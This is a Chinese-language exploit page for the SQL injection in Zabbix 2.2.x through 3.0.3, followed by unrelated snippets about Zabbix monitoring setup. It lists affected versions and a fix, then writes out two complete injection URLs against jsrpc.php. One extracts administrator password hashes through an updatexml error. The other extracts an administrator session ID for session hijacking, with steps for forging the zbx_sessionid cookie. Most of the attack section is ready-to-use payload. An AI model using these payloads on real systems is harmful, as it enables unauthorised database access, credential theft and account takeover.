Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection

漏洞来源: http://seclists.org/fulldisclosure/2016/Aug/60

攻击成本:低

危害程度:

利用条件: 需要guest用户权限(未登录用户都被设定为guest用户的访问权限)

影响范围:2.2.x / 2.4.x/ 3.0.0-3.0.3

修复建议: 禁用guest用户或者升级到3.0.4

漏洞利用:

爆密码

sanr.com/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and updatexml(1,concat(0x3a,(select passwd from zabbix.users limit 0,1)),1))%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1

输出结果,如下表示漏洞存在:

输出结果,如下表示禁用guest:

爆sessionid(在密码破解不了情况下 可以使用session欺骗)

需要取掉爆出来sessionid前面的数字1,在进行修改zbx_sessionid的值。

sanr.com/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

zabbix具体版号查看

2.x版本

3.x版本

时间: 2024-10-29 19:06:46

Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection的相关文章

Zabbix 3.0.3 SQL Injection

Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ========================================== Title: Zabbix 3.0.3 SQL Injection Vulnerability Product: Zabbix Vulnerable Version(s): 2.2.x, 3.0.x Fixed Version: 3.0.4 Homepage: http

实现zabbix对tomcat的监控

what-zabbix 优点: 1>开源,无软件成本投入 2>Server 对设备性能要求低 3>支持设备多,自带多种监控模板 4>支持分布式集中管理,有自动发现功能,可以实现自动化监控 5>开放式接口,扩展性强,插件编写容易 6>当监控的 item 比较多服务器队列比较大时可以采用被动状态,被监控客户端主动从server 端去下载需要监控的 item 然后取数据上传到 server 端.这种方式对服务器的负载比较小. 7>Api 的支持,方便与其他系统结合 缺点

47 监控系统基础及zabbix介绍、zabbix工作原理及安装配置、zabbix on CentOS7、zabbix配置

02    zabbix工作原理及安装配置 配置环境 node1192.168.1.120CentOS6.7 node2192.168.1.121CentOS6.7 1.安装配置zabbix #安装前准备 [[email protected] ~]#yum -y install mysql-server mysq [[email protected] ~]# mysql mysql> CREATE DATABASE zabbix CHARACTER SET utf8; mysql> GRANT

Zabbix 使用规范和生成报表

一.软件版本 操作系统:CentOS-6.5-x86_64 zabbix版本:3.0.3 二.zabbix标准:   1.  主机命名规范: BJ-monitor-h-zabbix-01 **命名规范是,我们看一台主机能够知道主机位于哪里:BJ:做什么的:monitor:虚拟化还是实体机:h:跑什么服务:zabbix  第几台:01 2.  一台主机直接关联多个模板:不用创建多个分组(可以结合CMDB平台) Memcached :192.168.10.100 Php Linux:192.168.

16.使用zabbix api创建screen

zabbix的screen功能可以把graph聚合起来,统一进行展示, 我们的需求是把同一个主机组的同一个item聚合起来,比如一个screen显示同一个组的所有主机的内存使用率,达到类似ganglia的效果, 由于服务器较多,所以我们调用zabbix api来进行创建. 参考地址如下:谢谢各位大牛 https://www.zabbix.org/wiki/Python_script_to_create_Screen_from_all_Items/Graphs_of_a_host http://c

zabbix安装+邮件(短信)报警

zabbix安装+邮件(短信)报警 一.zabbix的安装 安装开发软件包 1.yum  -ygroupinstall  "DevelopmentTools" 2.安装所需的依赖包 yum -y install httpd mysqlmysql-server mysql-devel php php-mysql php-common php-mbstring php-gd php-odbcphp-pear php-bcmath.x86_64 curl curl-devel net-snm

深入浅出Zabbix 3.0 -- 第十五章 Zabbix 协议与API

今天是六.一儿童节,祝小朋友们节日快乐!发完此文就带我家小朋友出去玩耍了. 第十五章 Zabbix 协议与API 本章将介绍和开发相关的Zabbix协议和API的内容,通过对Zabbix协议和API的深入了解,你可以利用Zabbix协议编写客户端程序并将其嵌入的产品或系统中,并将数据发送到Zabbix server,这在无法安装Zabbixagent等程序的场景(例如专用的嵌入式系统)中非常有用.你也可以利用Zabbix API开发自己的业务系统,或灵活的与现有系统整合集成. 15.1 Zabb

zabbix自动发现与监控内存和CPU使用率最高的进程

监控需求 某项目的应用服务器CPU和内存使用率的监控,通过zabbix系统监控记录应用服务器上进程的CPU和内存的使用情况,并以图表的形式实时展现,以便于我们分析服务器的性能瓶颈. 监控方式 利用zabbix监控系统的自动发现功能,首先编写shell脚本获取服务器的CPU和内存资源使用率最大的进程,以json的格式输出,然后对这些进程的CPU和内存资源使用情况进行监控.(本文监控的进程为Linux服务器中资源使用率最高的10个进程.) 缺点 不适用于监控固定的进程 首先使用top命令查看进程状态

部署zabbix监控mysql (一) 安装zabbix

部署zabbix监控mysql (1)安装LAMP环境 [[email protected] ~]# yum -y installmysql-server http php (2)安装zabbix web所需要的依赖包 [[email protected] ~]# yum -y installmysql-dev gcc net-snmp-devel curl-devel perl-DBI php-gd php-mysql php-bcmathphp-mbstring php-xml 安装Fpin